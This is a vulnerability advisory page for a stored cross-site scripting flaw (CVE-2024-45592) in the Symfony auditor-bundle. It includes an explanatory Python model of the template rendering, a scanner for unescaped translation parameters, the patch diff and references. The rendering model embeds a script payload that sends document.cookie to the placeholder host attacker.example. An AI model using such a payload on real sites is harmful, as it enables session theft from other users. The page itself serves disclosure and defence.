auditor-bundle vulnerable to Cross-site Scripting because name of entity does not get escaped
Description
auditor-bundle, formerly known as DoctrineAuditBundle, integrates the auditor library into any Symfony 3.4+ application. Prior to version 5.2.6, an entity property is rendered unescaped in the audit log, enabling JavaScript injection: the %source_label% parameter in a Twig macro is not escaped, so script tags can be inserted and are executed when the audit entry is viewed. The vulnerability is fixed in versions 5.2.6 and 6.0.0.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
auditor-bundle (DoctrineAuditBundle) for Symfony 3.4+ allowed JavaScript injection due to unescaped entity property in Twig macro.
Vulnerability
Description
CVE-2024-45592 is a Cross-Site Scripting (XSS) vulnerability in auditor-bundle (formerly DoctrineAuditBundle), which integrates the auditor library into Symfony applications from version 3.4 onward. In the audit summary macro, entity-derived values are passed as parameters to the |trans filter without escaping, and the translated string is then emitted through the |raw filter, so the values reach the page as live HTML rather than text [1]. The advisory names %source_label%, but the same hunk shows six such parameters: %source%, %source_label%, %target_link%, %target%, %target_label% and %user% [3][4].
Exploitation
To exploit this flaw, an attacker must be able to control the value of an audited entity property that ends up as source_label (or one of the other unescaped parameters) in the audit log summary view. For instance, if a user can modify a field such as an entity's 'name' that later appears as %source_label% in the audit trail, they can embed a `<script>` tag or other HTML in it. No privilege beyond what is needed to create or modify audited entities is required; the injected script executes when an administrator or other user views the audit log details page [1].
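To make the mechanics concrete, here is an added Python model of the macro's rendering pipeline. It is not code from auditor-bundle or Symfony: Twig's |escape is approximated with Python's html.escape, Symfony's placeholder substitution with a single-pass regex replacement, and the catalogue message, route path and audit entry are constructed for the illustration. It renders the same entry before and after the 5.2.6 change.

```python
import html
import re

# Constructed stand-in for one message of the 'auditor' translation domain. The real
# catalogue strings are not shown on the page; this shape is an assumption, chosen so
# the rendered summary is HTML (which is why the macro ends in |raw).
CATALOG = {
    "audit.audit_details.summary.update": (
        '<a href="%source_link%">%source%</a> <em>%source_label%</em> '
        "was updated by %user%%ip%"
    ),
    "audit.audit_details.summary.unkown_user": "unknown user",
}


def trans(key, params):
    """Mimics Symfony's Translator::trans(): a single-pass strtr() of the
    placeholders; parameter values are inserted verbatim, never escaped."""
    if not params:
        return CATALOG[key]
    pattern = "|".join(re.escape(p) for p in params)
    return re.sub(pattern, lambda m: params[m.group(0)], CATALOG[key])


def twig_escape(value):
    """Approximates Twig's |escape (html strategy): htmlspecialchars with ENT_QUOTES."""
    return html.escape(str(value), quote=True)


def render_summary(action, entry, patched):
    """Reproduces the macro's `trans({...}, domain='auditor')|raw` pipeline for the
    source side of an audit entry.

    patched=False: every parameter is passed through as-is (behaviour before 5.2.6).
    patched=True:  the values the fix wraps in |escape are escaped first; %source_link%
                   is left alone exactly as in the hunk. The return value is what |raw
                   writes into the page without further escaping."""
    esc = twig_escape if patched else (lambda v: v)
    username = entry.get("username")
    params = {
        "%source_link%": entry["source_link"],
        "%source%": esc(entry["source_subject"]),
        "%source_label%": esc(entry["source_label"]),
        "%user%": (trans("audit.audit_details.summary.unkown_user", {})
                   if username is None else esc(username)),
        "%ip%": ", IP: %s" % entry["ip"] if entry.get("ip") else "",
    }
    return trans("audit.audit_details.summary." + action, params)


# Constructed audit entry: the attacker set the entity's name (which becomes
# source_label) to a script tag through an ordinary edit form.
PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
ENTRY = {
    "source_link": "/audit/App-Entity-Customer/42",
    "source_subject": "Customer#42",
    "source_label": PAYLOAD,
    "username": "alice",
    "ip": "203.0.113.7",
}

if __name__ == "__main__":
    print("before fix:", render_summary("update", ENTRY, patched=False))
    print("after fix: ", render_summary("update", ENTRY, patched=True))
```

The unpatched rendering contains the payload's `<script>` element verbatim inside the summary; the patched rendering contains `&lt;script&gt;` and the browser shows the name as text. Escaping happens at render time, so entity values already stored with markup become harmless as soon as the template is updated.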
Impact
Successful exploitation executes arbitrary JavaScript in the victim's browser session, which can lead to session hijacking, unauthorized actions performed as the victim, data theft, or defacement within the application. Because the vulnerability lies in the audit log UI, any user who can view audit entries is a potential victim. No CVSS v4 score has been provided yet, but the issue is a stored XSS scenario: the payload is persisted in the entity and fires on every later view of the entry [1].
Mitigation
The vulnerability is patched in versions 5.2.6 and 6.0.0 of the bundle. The fix applies the |escape filter to the six entity-derived parameters passed to the translation function, so their values are HTML-escaped before the translated string is emitted through |raw [3][4]. Users still running version 5.x (which is now end-of-life) are strongly advised to upgrade to a supported version (6.x or 7.x) immediately [2]. No workaround has been published; restricting the audit view to trusted users reduces exposure until the upgrade is done. Because the fix escapes at render time, no cleanup of already-stored entity values is needed once the patched template is in place.
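As a check for the same pattern in other templates, the following added Python script (not part of auditor-bundle or Symfony) scans Twig source for `|trans({...})` calls whose result is piped to `|raw` and reports parameters whose value expression is neither a string literal nor terminated by `|escape` or `|e`. The three template snippets are constructed from the hunk shown under Patches; the parsing is a delimiter-counting heuristic, not a Twig parser, and it goes beyond the advisory's single %source_label% case by listing every unescaped parameter.

```python
import re

# A value expression whose LAST filter is |escape / |e (optionally with a strategy
# argument). A suffix check only proves the final operand is escaped: in a ternary
# like `a ? b : c|escape` Twig applies the filter to `c` alone.
ESCAPED_RE = re.compile(r"\|\s*(?:escape|e)\s*(?:\([^)]*\))?\s*$")
LITERAL_RE = re.compile(r"^(?:'[^']*'|\"[^\"]*\")$")
TRANS_RE = re.compile(r"\|\s*trans\s*\(")


def _matching_close(text, start, open_ch, close_ch):
    """Index just past the delimiter closing text[start]; string literals are skipped."""
    depth, quote, i = 0, None, start
    while i < len(text):
        ch = text[i]
        if quote:
            if ch == "\\":
                i += 1  # skip the escaped character inside a string
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch == open_ch:
            depth += 1
        elif ch == close_ch:
            depth -= 1
            if depth == 0:
                return i + 1
        i += 1
    raise ValueError("unbalanced %s%s" % (open_ch, close_ch))


def _split_top_level(text):
    """Split on commas that are not nested in (), [], {} or a string literal."""
    parts, buf, depth, quote, i = [], [], 0, None, 0
    while i < len(text):
        ch = text[i]
        buf.append(ch)
        if quote:
            if ch == "\\" and i + 1 < len(text):
                buf.append(text[i + 1])
                i += 1
            elif ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif ch in "([{":
            depth += 1
        elif ch in ")]}":
            depth -= 1
        elif ch == "," and depth == 0:
            buf.pop()
            parts.append("".join(buf))
            buf = []
        i += 1
    parts.append("".join(buf))
    return [p.strip() for p in parts if p.strip()]


def unescaped_trans_params(template):
    """Placeholder names passed to a |trans(...) whose result is piped to |raw and
    whose value expression is neither a string literal nor ends in |escape / |e."""
    findings = []
    for m in TRANS_RE.finditer(template):
        args_start = m.end() - 1  # the "(" of trans(
        args_end = _matching_close(template, args_start, "(", ")")
        if not re.match(r"\s*\|\s*raw\b", template[args_end:]):
            continue  # no |raw: Twig autoescaping still protects this output
        args = template[args_start + 1:args_end - 1]
        brace = args.find("{")
        if brace < 0:
            continue  # no parameter hash, nothing is interpolated
        params = args[brace + 1:_matching_close(args, brace, "{", "}") - 1]
        for entry in _split_top_level(params):
            key, _, value = entry.partition(":")
            key, value = key.strip().strip("'\""), value.strip()
            if LITERAL_RE.match(value) or ESCAPED_RE.search(value):
                continue
            findings.append(key)
    return findings


# Constructed from the pre-fix side of the hunk in helper.html.twig.
VULNERABLE_TEMPLATE = """{{ ('audit.audit_details.summary.' ~ action)|trans({
    '%source_link%': path('dh_auditor_show_entity_history', { 'entity': helper.namespaceToParam(entity), 'id': entry.getObjectId() }),
    '%source%': source_subject,
    '%source_label%': source_label,
    '%target_link%': target_link,
    '%target%': target_subject,
    '%target_label%': target_label,
    '%user%': entry.getUsername() is null ? 'audit.audit_details.summary.unkown_user'|trans(domain='auditor') : entry.getUsername(),
    '%ip%': entry.getIp() is not empty ? ', IP: ' ~ entry.getIp() : '',
}, domain='auditor')|raw }}"""

# Constructed from the post-fix side of the same hunk.
FIXED_TEMPLATE = """{{ ('audit.audit_details.summary.' ~ action)|trans({
    '%source_link%': path('dh_auditor_show_entity_history', { 'entity': helper.namespaceToParam(entity), 'id': entry.getObjectId() }),
    '%source%': source_subject|escape,
    '%source_label%': source_label|escape,
    '%target_link%': target_link|escape,
    '%target%': target_subject|escape,
    '%target_label%': target_label|escape,
    '%user%': entry.getUsername() is null ? 'audit.audit_details.summary.unkown_user'|trans(domain='auditor') : entry.getUsername()|escape,
    '%ip%': entry.getIp() is not empty ? ', IP: ' ~ entry.getIp() : '',
}, domain='auditor')|raw }}"""

# Same template with |raw dropped: autoescaping would handle it, so nothing is reported.
AUTOESCAPED_TEMPLATE = VULNERABLE_TEMPLATE.replace(")|raw }}", ") }}")
```

Run against the constructed snippets, the pre-fix template yields all eight parameters and the fixed template still yields `%source_link%` and `%ip%`, which the hunk leaves unescaped; whether those two carry attacker-controlled data is not something the page states, so treat them as items to review rather than confirmed findings.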
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| damienharper/auditor-bundle (Packagist) | < 5.2.6 | 5.2.6 |
Affected products
- damienharper/auditor-bundle, range: < 5.2.6
Patches
e7deb377fa89 CVE-2024-45592 fix
1 file changed · +6 −6
src/Resources/views/Audit/helpers/helper.html.twig+6 −6 modified@@ -65,12 +65,12 @@ {{ ('audit.audit_details.summary.' ~ action)|trans({ '%source_link%': path('dh_auditor_show_entity_history', { 'entity': helper.namespaceToParam(entity), 'id': entry.getObjectId() }), - '%source%': source_subject, - '%source_label%': source_label, - '%target_link%': target_link, - '%target%': target_subject, - '%target_label%': target_label, - '%user%': entry.getUsername() is null ? 'audit.audit_details.summary.unkown_user'|trans(domain='auditor') : entry.getUsername(), + '%source%': source_subject|escape, + '%source_label%': source_label|escape, + '%target_link%': target_link|escape, + '%target%': target_subject|escape, + '%target_label%': target_label|escape, + '%user%': entry.getUsername() is null ? 'audit.audit_details.summary.unkown_user'|trans(domain='auditor') : entry.getUsername()|escape, '%ip%': entry.getIp() is not empty ? ', IP: ' ~ entry.getIp() : '', }, domain='auditor')|raw }} {% endmacro %}
42ba2940d8b9 Merge commit from fork
1 file changed · +6 −6
src/Resources/views/Audit/helpers/helper.html.twig+6 −6 modified@@ -65,12 +65,12 @@ {{ ('audit.audit_details.summary.' ~ action)|trans({ '%source_link%': path('dh_auditor_show_entity_history', { 'entity': helper.namespaceToParam(entity), 'id': entry.getObjectId() }), - '%source%': source_subject, - '%source_label%': source_label, - '%target_link%': target_link, - '%target%': target_subject, - '%target_label%': target_label, - '%user%': entry.getUsername() is null ? 'audit.audit_details.summary.unkown_user'|trans(domain='auditor') : entry.getUsername(), + '%source%': source_subject|escape, + '%source_label%': source_label|escape, + '%target_link%': target_link|escape, + '%target%': target_subject|escape, + '%target_label%': target_label|escape, + '%user%': entry.getUsername() is null ? 'audit.audit_details.summary.unkown_user'|trans(domain='auditor') : entry.getUsername()|escape, '%ip%': entry.getIp() is not empty ? ', IP: ' ~ entry.getIp() : '', }, domain='auditor')|raw }} {% endmacro %}
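Review bot: `%source_link%` and `%ip%` are the two parameters this hunk leaves unescaped while the whole translated string is still emitted with `|raw`, so `entry.getIp()` reaches the page verbatim; for consistency with the six parameters that now carry `|escape`, wrap it too, e.g. `'%ip%': entry.getIp() is not empty ? ', IP: ' ~ entry.getIp()|escape : ''` (the filter binds tighter than `~`, so only the IP value is escaped). In the `%user%` line the `|escape` binds only to the else branch of the ternary; that is fine today because the other branch is a static catalogue string, but a later edit that makes that branch dynamic would silently lose escaping, so escaping both branches or parenthesising the ternary would make the intent explicit. Keeping `|raw` also means every message in the `auditor` translation domain remains trusted HTML, which is worth a comment in the template. The two commits (e7deb377fa89 and 42ba2940d8b9) carry an identical hunk.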
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- github.com/advisories/GHSA-78vg-7v27-hj67 (GHSA, ADVISORY)
- nvd.nist.gov/vuln/detail/CVE-2024-45592 (ADVISORY)
- github.com/DamienHarper/auditor-bundle/commit/42ba2940d8b99467de0c806ea5655cc1c6882cd1 (MISC, WEB)
- github.com/DamienHarper/auditor-bundle/commit/e7deb377fa89677d44973b486d26d6a7374233ae (MISC, WEB)
- github.com/DamienHarper/auditor-bundle/security/advisories/GHSA-78vg-7v27-hj67 (CONFIRM, WEB)
News mentions
No linked articles in our index yet.